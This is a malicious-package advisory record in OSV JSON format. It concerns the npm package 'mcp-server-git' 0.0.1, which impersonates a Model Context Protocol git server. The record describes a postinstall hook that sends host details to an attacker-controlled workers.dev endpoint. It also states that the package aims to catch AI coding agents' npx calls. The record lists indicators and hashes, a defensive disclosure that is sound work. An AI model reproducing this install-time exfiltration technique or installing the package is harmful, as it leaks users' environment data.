{"id":"MAL-2026-5478","summary":"Malicious code in mcp-server-git (npm)","details":"\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (4cf54d60f4aeb261f3b4c523293183b728b02bc20255aeab62d7f86c94adc7ed)\npackage.json declares `postinstall: node index.js`. On every `npm install`, index.js (lines 14-29) reads `os.hostname()`, `process.cwd()`, `os.platform()`, the npm user-agent, and Node version, and POSTs them as JSON to the hardcoded endpoint `https://npx-canary-log.vulnerable-live.workers.dev/log` (index.js:16). The package name `mcp-server-git` impersonates the well-known Model Context Protocol git server (officially distributed under a different name); the README states the unscoped npm name was claimed specifically to intercept `npx mcp-server-git` invocations from AI coding agents and developer tooling. The combination of name impersonation and unconsented install-time exfiltration of internal hostnames and build paths to an author-controlled Cloudflare Worker constitutes a supply-chain attack on installers, regardless of the author's self-described 'canary research' framing — CI systems, developer workstations, and AI agents that resolve `mcp-server-git` will leak environment identifiers without consent.\n","modified":"2026-06-09T21:01:35.963783939Z","published":"2026-06-09T20:34:59Z","database_specific":{"malicious-packages-origins":[{"id":"IN-MAL-2026-005235","modified_time":"2026-06-09T20:34:59Z","import_time":"2026-06-09T20:45:57.967991856Z","versions":["0.0.1"],"source":"amazon-inspector","sha256":"4cf54d60f4aeb261f3b4c523293183b728b02bc20255aeab62d7f86c94adc7ed"},{"id":"IN-MAL-2026-005236","modified_time":"2026-06-09T20:34:59Z","import_time":"2026-06-09T20:45:58.33271789Z","versions":["0.0.1"],"source":"amazon-inspector","sha256":"b36a6a2aba7eabab28a2caa71b383383748c37d5de81b722a86635e94147464b"}]},"references":[{"type":"PACKAGE","url":"https://www.npmjs.com/package/mcp-server-git/v/0.0.1"}],"affected":[{"package":{"name":"mcp-server-git","ecosystem":"npm","purl":"pkg:npm/mcp-server-git"},"versions":["0.0.1"],"database_specific":{"cwes":[{"cweId":"CWE-506","description":"The product contains code that appears to be malicious in nature.","name":"Embedded Malicious Code"}],"indicators":{"package_integrity":[{"hashes":{"sha512_sri":"sha512-ceAU3W3ZYBI4zq8mqNajWYt0+7PHwI4QLWw1xdVIOe8EjMpNxtJZsT1XarIaNrZxLi1eaAo0+4WH8rO/PJwdOQ==","sha1":"15ae727f57d27ba2136c6a9cfd09f9bb389dacca"},"filename":"mcp-server-git-0.0.1.tgz"}],"evidence_files":[{"path":"index.js","tlsh":"3f3195e180f805351bee46d3e1e9a899a36ff126360678f0b49e02295fc90980771cd2","sha256":"5e83b6b67a3582afabe200023d220baac49850a3bd1d292bf90e1c22697a91ed"},{"path":"package.json","tlsh":"3ff09e70d87496332afe46a154776444b579a9171680fc2923d3511cd64c5b703bf25d","sha256":"8f9c35937b99dbe40a493db65f6c8934e1c65a248b69b24c5558507f56e4b05a"}],"domains":["npx-canary-log.vulnerable-live.workers.dev"]},"source":"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/mcp-server-git/MAL-2026-5478.json"}}],"schema_version":"1.7.5","credits":[{"name":"Amazon Inspector","contact":["inspector-research@amazon.com"],"type":"FINDER"}]}